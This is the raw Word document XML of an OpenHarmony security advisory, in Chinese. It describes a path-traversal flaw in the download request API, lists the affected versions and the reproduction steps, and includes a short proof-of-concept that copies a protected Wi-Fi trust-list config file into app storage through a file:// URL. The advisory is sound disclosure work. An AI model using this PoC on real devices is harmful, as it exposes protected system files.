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pacing w:line="360" w:lineRule="auto"/>
              <w:outlineLvl w:val="9"/>
              <w:rPr>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>OpenHarmony-SA-2022-0901</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:outlineLvl w:val="9"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1、</w:t>
            </w:r>
            <w:r>
              <w:t>漏洞分析</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>根因分析</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:i/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>未过滤非法url参数导致路径穿越</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>复现步骤</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="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1.才任意应用中加入poc代码，编译执行</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="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2.hdc_std shell 命令进入shell模式</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="default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3.执行find / -name file_name，可以看到下载的本地文件</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:outlineLvl w:val="9"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2、受影响版本</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="40485B"/>
                <w:sz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40485B"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>OpenHarmony-v3.1-Release到OpenHarmony-v3.1.2-Release</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:outlineLvl w:val="9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t>漏洞触发</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用例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poc.ets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request from "@ohos.request"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>downloadFile(urlPath, out) {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let downloadConfig = {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:bidi w:val="0"/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       url: urlPath,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> //敏感文件地址</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:bidi w:val="0"/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       filePath: '/data/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>storage/el2/base/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>'+out</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> //保存地址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let downloadTask;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// Obtain the DownloadTask instance using a callback.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request.download(downloadConfig).then((data) =&gt; {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downloadTask = data;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downloadTask.on('fail', (error) =&gt; {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    console.info("download fail error:" + JSON.stringify(error));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});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}).catch((err) =&gt; {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    console.error('Failed to request the download. Cause: ' + JSON.stringify(err));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   })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downloadFile('file:///data/misc/wifi/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>trust_list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default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polices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>.conf', '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>trust_list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>_config.conf')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:outlineLvl w:val="9"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4、</w:t>
            </w:r>
            <w:r>
              <w:t>验证效果</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>提供执行效果截图</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>合入补丁前版本</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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sz w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4542155" cy="471805"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="635"/>
                  <wp:docPr id="2" name="图片 2" descr="13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32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15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/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>合入补丁后版本</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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sz w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4629150" cy="411480"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="1" name="图片 1" descr="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3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ind w:firstLine="420"/>
              <w:rPr>
                <w:sz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5Y2YxZmMxMmYzZGQwZjg3ZTRhOTMxNDkzZTUzNTgifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00556DF1"/>
    <w:rsid w:val="004A7831"/>
    <w:rsid w:val="00556DF1"/>
    <w:rsid w:val="00812B05"/>
    <w:rsid w:val="008C2531"/>
    <w:rsid w:val="00A30108"/>
    <w:rsid w:val="00B31AB4"/>
    <w:rsid w:val="00B63FF0"/>
    <w:rsid w:val="00F11082"/>
    <w:rsid w:val="075A0D1F"/>
    <w:rsid w:val="0DA770AD"/>
    <w:rsid w:val="12192F33"/>
    <w:rsid w:val="1D6A6161"/>
    <w:rsid w:val="1E345155"/>
    <w:rsid w:val="21667959"/>
    <w:rsid w:val="25401C79"/>
    <w:rsid w:val="25ED47F7"/>
    <w:rsid w:val="260804F2"/>
    <w:rsid w:val="286D102C"/>
    <w:rsid w:val="2D63393C"/>
    <w:rsid w:val="2DA570AC"/>
    <w:rsid w:val="2F6D7B0F"/>
    <w:rsid w:val="3257143F"/>
    <w:rsid w:val="38F21D61"/>
    <w:rsid w:val="3F2A7D78"/>
    <w:rsid w:val="40DA536B"/>
    <w:rsid w:val="43846432"/>
    <w:rsid w:val="45946363"/>
    <w:rsid w:val="496B110B"/>
    <w:rsid w:val="569E30CB"/>
    <w:rsid w:val="5E93283E"/>
    <w:rsid w:val="5F7A39FE"/>
    <w:rsid w:val="648E6515"/>
    <w:rsid w:val="653546CE"/>
    <w:rsid w:val="73177EA8"/>
    <w:rsid w:val="75DD762C"/>
    <w:rsid w:val="7CB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both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="宋体"/>
      <w:kern w:val="0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autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left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777</Characters>
  <Lines>52</Lines>
  <Paragraphs>4</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>916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2023-02-10T11:28:00Z</dcterms:created>
  <dc:creator>王 王宇琛</dc:creator>
  <cp:lastModifiedBy>加载中...</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-16T13:33:52Z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AC3D474966CA4806B8D4E42909518A5D</vt:lpwstr>
  </property>
</Properties>
</file>